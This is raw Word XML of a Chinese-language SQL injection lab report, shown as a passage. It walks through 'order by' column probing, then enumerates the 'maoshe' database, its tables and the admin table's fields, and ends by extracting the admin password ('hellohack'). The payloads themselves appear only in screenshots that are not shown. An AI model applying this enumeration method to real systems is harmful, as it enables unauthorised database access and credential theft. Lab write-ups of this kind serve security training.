                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>分析选择列个数和显示值位置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6850E434" w14:textId="034A1009" w:rsidR="00C03142" w:rsidRPr="005A0201" w:rsidRDefault="00C03142" w:rsidP="00C03142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由下可知，o</w:t>
            </w:r>
            <w:r>
              <w:t>rder by 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>显示正常，o</w:t>
            </w:r>
            <w:r>
              <w:t>rder by 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>无显示，则</w:t>
            </w:r>
            <w:r w:rsidR="00B0512A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选择列数为</w:t>
            </w:r>
            <w:r w:rsidR="00501482">
              <w:t>2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35A99817" w14:textId="77777777" w:rsidR="00973DC7" w:rsidRDefault="00073B80" w:rsidP="005A0201">
            <w:pPr>
              <w:pStyle w:val="a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56A8082" wp14:editId="5127A759">
                  <wp:extent cx="4871085" cy="1871980"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="711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87198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E1AC011" w14:textId="77777777" w:rsidR="00501482" w:rsidRDefault="00501482" w:rsidP="005A0201">
            <w:pPr>
              <w:pStyle w:val="a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AFA8A9A" wp14:editId="21BE84E6">
                  <wp:extent cx="4871085" cy="1567815"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="704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56781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6CB6694" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRDefault="00F6692B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/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54C59449" w14:textId="714608C5" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4、</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10FAF462" w14:textId="2828F472" w:rsidR="004F76C6" w:rsidRDefault="004F76C6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得到当前数据库名称为m</w:t>
            </w:r>
            <w:r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aoshe</w:t>
            </w:r>
            <w:r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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570E6F57" w14:textId="3BCBB567" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="004F76C6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1E43FBD" wp14:editId="1159B639">
                  <wp:extent cx="4871085" cy="1744980"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="838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74498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FD23492" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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</w:p>
          <w:p w14:paraId="1E37A852" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5、</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555386C2" w14:textId="4E89A65F" w:rsidR="00F6692B" w:rsidRDefault="00F6692B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 w:rsidRPr="00F6692B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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B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1)获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B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所有数据库中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B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所有表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C07A88" w14:textId="4EA9192F" w:rsidR="00081B1A" w:rsidRPr="00F6692B" w:rsidRDefault="00081B1A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可以看到有很多表，因为包含了所有schema。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0065978C" w14:textId="3D3B33DE" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00B60FB4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341AE8E" wp14:editId="4C4CF80B">
                  <wp:extent cx="4871085" cy="1986915"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="7048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98691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4738BE2" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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 w:rsidRPr="00F6692B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(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B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2)获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B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当前所在数据库中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B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所有表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FCA3584" w14:textId="25CAF3B1" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="007E26E0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可以看到</w:t>
            </w:r>
            <w:r w:rsidR="00F6692B" w:rsidRPr="00F6692B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m</w:t>
            </w:r>
            <w:r w:rsidR="00F6692B" w:rsidRPr="00F6692B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aoshe</w:t>
            </w:r>
            <w:r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中有四张表。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B73FE11" w14:textId="27049491" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="007E26E0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C43FEF" wp14:editId="7242592D">
                  <wp:extent cx="4871085" cy="1682115"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="7048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68211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BE6A86A" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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</w:p>
          <w:p w14:paraId="0AD7ED56" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>6、</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B8B56A" w14:textId="53FC26E0" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="007E26E0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可以看到在</w:t>
            </w:r>
            <w:r w:rsidR="006F39D8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maoshe中的</w:t>
            </w:r>
            <w:r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a</w:t>
            </w:r>
            <w:r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dmin</w:t>
            </w:r>
            <w:r w:rsidR="006F39D8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表，有3个字段，分别为I</w:t>
            </w:r>
            <w:r w:rsidR="006F39D8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d,username,password</w:t>
            </w:r>
            <w:r w:rsidR="006F39D8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。</w:t>
            </w:r>
            <w:r w:rsidR="00735149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其他表的字段数量和字段名获取同理，不做赘述。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01146DB1" w14:textId="0C9B4C9C" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="007E26E0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D6AB5A" wp14:editId="222B96BF">
                  <wp:extent cx="4871085" cy="1978025"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="7937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97802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7C0CC09" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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</w:p>
          <w:p w14:paraId="0A60399C" w14:textId="77777777" w:rsidR="00F6692B" w:rsidRPr="00F6692B" w:rsidRDefault="00F6692B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/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7、</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0886DB64" w14:textId="6AC68995" w:rsidR="00F6692B" w:rsidRDefault="00F6692B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 w:rsidRPr="00F6692B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用户名：</w:t>
            </w:r>
            <w:r w:rsidR="00E45380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a</w:t>
            </w:r>
            <w:r w:rsidR="00E45380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dmin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3775B4D9" w14:textId="4C8EC16E" w:rsidR="0000673B" w:rsidRPr="00F6692B" w:rsidRDefault="0000673B" w:rsidP="00F6692B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="288" w:lineRule="auto"/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B9F6850" wp14:editId="4A324D0E">
                  <wp:extent cx="4871085" cy="1578610"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="7874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57861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8952F7B" w14:textId="58C1D2CD" w:rsidR="00F6692B" w:rsidRDefault="00F6692B" w:rsidP="006C513A">
            <w:pPr>
              <w:pStyle w:val="a7"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6692B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户密码：</w:t>
            </w:r>
            <w:r w:rsidR="006C513A" w:rsidRPr="006C513A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>hellohack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E25900A" w14:textId="2C3B044D" w:rsidR="006C513A" w:rsidRPr="005A0201" w:rsidRDefault="006C513A" w:rsidP="006C513A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20C288" wp14:editId="0C043D14">
                  <wp:extent cx="4871085" cy="1582420"/>
                  <wp:effectExtent l="38100" t="38100" r="81915" b="7493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58242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17177" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00125B21"/>
    <w:p w14:paraId="54DA86DF" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00D31D50">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00125B2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C9713" w14:textId="77777777" w:rsidR="00305FC7" w:rsidRDefault="00305FC7" w:rsidP="00455D87">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02AED271" w14:textId="77777777" w:rsidR="00305FC7" w:rsidRDefault="00305FC7" w:rsidP="00455D8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03023" w14:textId="77777777" w:rsidR="00305FC7" w:rsidRDefault="00305FC7" w:rsidP="00455D87">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04537E0B" w14:textId="77777777" w:rsidR="00305FC7" w:rsidRDefault="00305FC7" w:rsidP="00455D8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B5BF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6706E3D8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="-120"/>
        </w:tabs>
        <w:ind w:left="-1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600"/>
        </w:tabs>
        <w:ind w:left="60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1320"/>
        </w:tabs>
        <w:ind w:left="132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042D15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53181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A35EBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB4AF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5E579C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62B0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6B1A28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E14C1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2922CE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB261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995506"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17847E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BCE2D0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40FA1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1E4B99"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04AC91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48D2270"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E42BFBA"/>
    <w:lvl w:ilvl="0" w:tplc="6B08814A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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972319577">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1354183787">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="750393112">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2092004401">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1247307373">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="595141413">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1532181066">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1372146667">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="464928680">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="4839382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673B"/>
    <w:rsid w:val="00025D63"/>
    <w:rsid w:val="000464C0"/>
    <w:rsid w:val="00063492"/>
    <w:rsid w:val="00070338"/>
    <w:rsid w:val="00073B80"/>
    <w:rsid w:val="00081B1A"/>
    <w:rsid w:val="0009128A"/>
    <w:rsid w:val="000B6946"/>
    <w:rsid w:val="000C6327"/>
    <w:rsid w:val="000D7AA8"/>
    <w:rsid w:val="000E456D"/>
    <w:rsid w:val="000F131D"/>
    <w:rsid w:val="0010227E"/>
    <w:rsid w:val="001053E8"/>
    <w:rsid w:val="00105D6F"/>
    <w:rsid w:val="001066F5"/>
    <w:rsid w:val="001107FB"/>
    <w:rsid w:val="00125B21"/>
    <w:rsid w:val="00130278"/>
    <w:rsid w:val="0015666D"/>
    <w:rsid w:val="0016004C"/>
    <w:rsid w:val="00176A93"/>
    <w:rsid w:val="00177366"/>
    <w:rsid w:val="00180E97"/>
    <w:rsid w:val="00185182"/>
    <w:rsid w:val="001858B4"/>
    <w:rsid w:val="001A0762"/>
    <w:rsid w:val="001A18F2"/>
    <w:rsid w:val="001A3E32"/>
    <w:rsid w:val="001B0DA1"/>
    <w:rsid w:val="001D622B"/>
    <w:rsid w:val="001D66A9"/>
    <w:rsid w:val="001D7E88"/>
    <w:rsid w:val="001E1768"/>
    <w:rsid w:val="001F5C55"/>
    <w:rsid w:val="002036AA"/>
    <w:rsid w:val="0021258D"/>
    <w:rsid w:val="00213369"/>
    <w:rsid w:val="002277A7"/>
    <w:rsid w:val="00227DCD"/>
    <w:rsid w:val="00236F40"/>
    <w:rsid w:val="002411E7"/>
    <w:rsid w:val="00265A83"/>
    <w:rsid w:val="00275C73"/>
    <w:rsid w:val="002768FF"/>
    <w:rsid w:val="0028261B"/>
    <w:rsid w:val="00283568"/>
    <w:rsid w:val="002878D9"/>
    <w:rsid w:val="0029005F"/>
    <w:rsid w:val="002A4975"/>
    <w:rsid w:val="002B57C3"/>
    <w:rsid w:val="002D37B1"/>
    <w:rsid w:val="002E45C8"/>
    <w:rsid w:val="002F1323"/>
    <w:rsid w:val="002F41AA"/>
    <w:rsid w:val="00302355"/>
    <w:rsid w:val="00305FC7"/>
    <w:rsid w:val="003102D6"/>
    <w:rsid w:val="0031524E"/>
    <w:rsid w:val="00317B6C"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="0033410F"/>
    <w:rsid w:val="00340152"/>
    <w:rsid w:val="00352E69"/>
    <w:rsid w:val="00372D09"/>
    <w:rsid w:val="00391550"/>
    <w:rsid w:val="0039293B"/>
    <w:rsid w:val="003A6FAF"/>
    <w:rsid w:val="003B3278"/>
    <w:rsid w:val="003B359B"/>
    <w:rsid w:val="003C058F"/>
    <w:rsid w:val="003D1456"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="003D6703"/>
    <w:rsid w:val="003E669A"/>
    <w:rsid w:val="003F4DEC"/>
    <w:rsid w:val="003F5324"/>
    <w:rsid w:val="00401F7E"/>
    <w:rsid w:val="004179E3"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00427AC4"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="0043594C"/>
    <w:rsid w:val="00443E3E"/>
    <w:rsid w:val="00455D87"/>
    <w:rsid w:val="00463954"/>
    <w:rsid w:val="00464297"/>
    <w:rsid w:val="00465049"/>
    <w:rsid w:val="0047132C"/>
    <w:rsid w:val="00475417"/>
    <w:rsid w:val="00476003"/>
    <w:rsid w:val="00480B5D"/>
    <w:rsid w:val="00484CAD"/>
    <w:rsid w:val="004942C0"/>
    <w:rsid w:val="004C09B7"/>
    <w:rsid w:val="004D343F"/>
    <w:rsid w:val="004D482E"/>
    <w:rsid w:val="004E2E0D"/>
    <w:rsid w:val="004F42FF"/>
    <w:rsid w:val="004F76C6"/>
    <w:rsid w:val="00501482"/>
    <w:rsid w:val="005135A6"/>
    <w:rsid w:val="00541616"/>
    <w:rsid w:val="00541E85"/>
    <w:rsid w:val="0056253E"/>
    <w:rsid w:val="00564F3D"/>
    <w:rsid w:val="005679BD"/>
    <w:rsid w:val="0057041B"/>
    <w:rsid w:val="00573AE7"/>
    <w:rsid w:val="0058539E"/>
    <w:rsid w:val="0058797B"/>
    <w:rsid w:val="005A0201"/>
    <w:rsid w:val="005B48DA"/>
    <w:rsid w:val="005D3610"/>
    <w:rsid w:val="005D7C00"/>
    <w:rsid w:val="00601178"/>
    <w:rsid w:val="00605FFD"/>
    <w:rsid w:val="00620B87"/>
    <w:rsid w:val="00631DE1"/>
    <w:rsid w:val="00635109"/>
    <w:rsid w:val="00635EC0"/>
    <w:rsid w:val="006502BE"/>
    <w:rsid w:val="00654CE7"/>
    <w:rsid w:val="006572A6"/>
    <w:rsid w:val="0067062A"/>
    <w:rsid w:val="00671A02"/>
    <w:rsid w:val="00692EFD"/>
    <w:rsid w:val="006941A1"/>
    <w:rsid w:val="006A0151"/>
    <w:rsid w:val="006A198E"/>
    <w:rsid w:val="006A23DE"/>
    <w:rsid w:val="006A25E3"/>
    <w:rsid w:val="006B0806"/>
    <w:rsid w:val="006B4277"/>
    <w:rsid w:val="006C513A"/>
    <w:rsid w:val="006C606A"/>
    <w:rsid w:val="006D2B0E"/>
    <w:rsid w:val="006F2CDE"/>
    <w:rsid w:val="006F39D8"/>
    <w:rsid w:val="007036F2"/>
    <w:rsid w:val="00707CB9"/>
    <w:rsid w:val="0072145C"/>
    <w:rsid w:val="00734E12"/>
    <w:rsid w:val="00735149"/>
    <w:rsid w:val="007414B3"/>
    <w:rsid w:val="00743C52"/>
    <w:rsid w:val="00747536"/>
    <w:rsid w:val="007563FE"/>
    <w:rsid w:val="007608EC"/>
    <w:rsid w:val="00766728"/>
    <w:rsid w:val="0077602A"/>
    <w:rsid w:val="00797B47"/>
    <w:rsid w:val="007A20C3"/>
    <w:rsid w:val="007A4ABF"/>
    <w:rsid w:val="007C3B56"/>
    <w:rsid w:val="007E2077"/>
    <w:rsid w:val="007E26E0"/>
    <w:rsid w:val="007F0509"/>
    <w:rsid w:val="00803CB6"/>
    <w:rsid w:val="00807833"/>
    <w:rsid w:val="0085051D"/>
    <w:rsid w:val="008561B1"/>
    <w:rsid w:val="00857459"/>
    <w:rsid w:val="0087591B"/>
    <w:rsid w:val="008A495D"/>
    <w:rsid w:val="008B175A"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="008E23CF"/>
    <w:rsid w:val="008E3993"/>
    <w:rsid w:val="008F5D1E"/>
    <w:rsid w:val="009006B7"/>
    <w:rsid w:val="009043D0"/>
    <w:rsid w:val="009222AB"/>
    <w:rsid w:val="00934268"/>
    <w:rsid w:val="00936C6B"/>
    <w:rsid w:val="00941055"/>
    <w:rsid w:val="00957A31"/>
    <w:rsid w:val="00960C5D"/>
    <w:rsid w:val="00961A31"/>
    <w:rsid w:val="00963A05"/>
    <w:rsid w:val="0096699A"/>
    <w:rsid w:val="009710D5"/>
    <w:rsid w:val="00971D8E"/>
    <w:rsid w:val="0097339F"/>
    <w:rsid w:val="00973DC7"/>
    <w:rsid w:val="0097504A"/>
    <w:rsid w:val="00982306"/>
    <w:rsid w:val="009B2BCB"/>
    <w:rsid w:val="009C10CA"/>
    <w:rsid w:val="009C3F7F"/>
    <w:rsid w:val="009C706C"/>
    <w:rsid w:val="009C7209"/>
    <w:rsid w:val="00A01018"/>
    <w:rsid w:val="00A014AA"/>
    <w:rsid w:val="00A0677B"/>
    <w:rsid w:val="00A07E6E"/>
    <w:rsid w:val="00A14DCA"/>
    <w:rsid w:val="00A16D1F"/>
    <w:rsid w:val="00A22455"/>
    <w:rsid w:val="00A22900"/>
    <w:rsid w:val="00A2325E"/>
    <w:rsid w:val="00A32864"/>
    <w:rsid w:val="00A37B76"/>
    <w:rsid w:val="00A44835"/>
    <w:rsid w:val="00A52AE8"/>
    <w:rsid w:val="00A562A4"/>
    <w:rsid w:val="00A57EFA"/>
    <w:rsid w:val="00A728C4"/>
    <w:rsid w:val="00A92EE6"/>
    <w:rsid w:val="00AA1842"/>
    <w:rsid w:val="00AB0961"/>
    <w:rsid w:val="00AC61CD"/>
    <w:rsid w:val="00AD3B9E"/>
    <w:rsid w:val="00AE5C28"/>
    <w:rsid w:val="00B0512A"/>
    <w:rsid w:val="00B124AB"/>
    <w:rsid w:val="00B22266"/>
    <w:rsid w:val="00B30AAF"/>
    <w:rsid w:val="00B32DC8"/>
    <w:rsid w:val="00B47A1E"/>
    <w:rsid w:val="00B60FB4"/>
    <w:rsid w:val="00B649B3"/>
    <w:rsid w:val="00B6784D"/>
    <w:rsid w:val="00B744B1"/>
    <w:rsid w:val="00B76417"/>
    <w:rsid w:val="00B84D8C"/>
    <w:rsid w:val="00B94859"/>
    <w:rsid w:val="00BA1513"/>
    <w:rsid w:val="00BC069F"/>
    <w:rsid w:val="00BC4791"/>
    <w:rsid w:val="00BE176C"/>
    <w:rsid w:val="00C03142"/>
    <w:rsid w:val="00C353F4"/>
    <w:rsid w:val="00C47A2E"/>
    <w:rsid w:val="00C55295"/>
    <w:rsid w:val="00C660C2"/>
    <w:rsid w:val="00C66CB1"/>
    <w:rsid w:val="00C721B7"/>
    <w:rsid w:val="00CA24C7"/>
    <w:rsid w:val="00CC46FC"/>
    <w:rsid w:val="00CC4BEF"/>
    <w:rsid w:val="00CD2BBE"/>
    <w:rsid w:val="00CE69C2"/>
    <w:rsid w:val="00CF2A14"/>
    <w:rsid w:val="00D0426E"/>
    <w:rsid w:val="00D31776"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00D36A3A"/>
    <w:rsid w:val="00D54174"/>
    <w:rsid w:val="00D61110"/>
    <w:rsid w:val="00D618E4"/>
    <w:rsid w:val="00D6642E"/>
    <w:rsid w:val="00D67021"/>
    <w:rsid w:val="00D72EC9"/>
    <w:rsid w:val="00D94920"/>
    <w:rsid w:val="00DA7340"/>
    <w:rsid w:val="00DD4B6A"/>
    <w:rsid w:val="00DE3A2D"/>
    <w:rsid w:val="00DE3ECC"/>
    <w:rsid w:val="00DE6963"/>
    <w:rsid w:val="00DF2E70"/>
    <w:rsid w:val="00E23BE5"/>
    <w:rsid w:val="00E23C91"/>
    <w:rsid w:val="00E45380"/>
    <w:rsid w:val="00E61A95"/>
    <w:rsid w:val="00E66E21"/>
    <w:rsid w:val="00E70AF7"/>
    <w:rsid w:val="00E71C40"/>
    <w:rsid w:val="00E7349F"/>
    <w:rsid w:val="00E73574"/>
    <w:rsid w:val="00E76A33"/>
    <w:rsid w:val="00E93D6C"/>
    <w:rsid w:val="00E96F7D"/>
    <w:rsid w:val="00E97C1C"/>
    <w:rsid w:val="00EB12B8"/>
    <w:rsid w:val="00EB239E"/>
    <w:rsid w:val="00EB3AE5"/>
    <w:rsid w:val="00EC3668"/>
    <w:rsid w:val="00EF0A79"/>
    <w:rsid w:val="00F03E45"/>
    <w:rsid w:val="00F13C0D"/>
    <w:rsid w:val="00F14825"/>
    <w:rsid w:val="00F17314"/>
    <w:rsid w:val="00F20B6A"/>
    <w:rsid w:val="00F25966"/>
    <w:rsid w:val="00F46923"/>
    <w:rsid w:val="00F50891"/>
    <w:rsid w:val="00F6692B"/>
    <w:rsid w:val="00F6708E"/>
    <w:rsid w:val="00F67960"/>
    <w:rsid w:val="00F97446"/>
    <w:rsid w:val="00FC4550"/>
    <w:rsid w:val="00FC46D1"/>
    <w:rsid w:val="00FC4B7A"/>
    <w:rsid w:val="00FC63BE"/>
    <w:rsid w:val="00FD0A7E"/>
    <w:rsid w:val="00FD665F"/>
    <w:rsid w:val="00FE3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4F30B1"/>
  <w15:docId w15:val="{D85BA296-3F6D-48A6-A072-C751D5244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58D"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahom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5C2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5D8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5D87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5D8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5D87"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a7">
    <w:name w:val="报告正文"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:qFormat/>
    <w:rsid w:val="001858B4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="1140"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
      <w:bCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00541616"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="报告正文 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="001858B4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
      <w:bCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00541616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41616"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
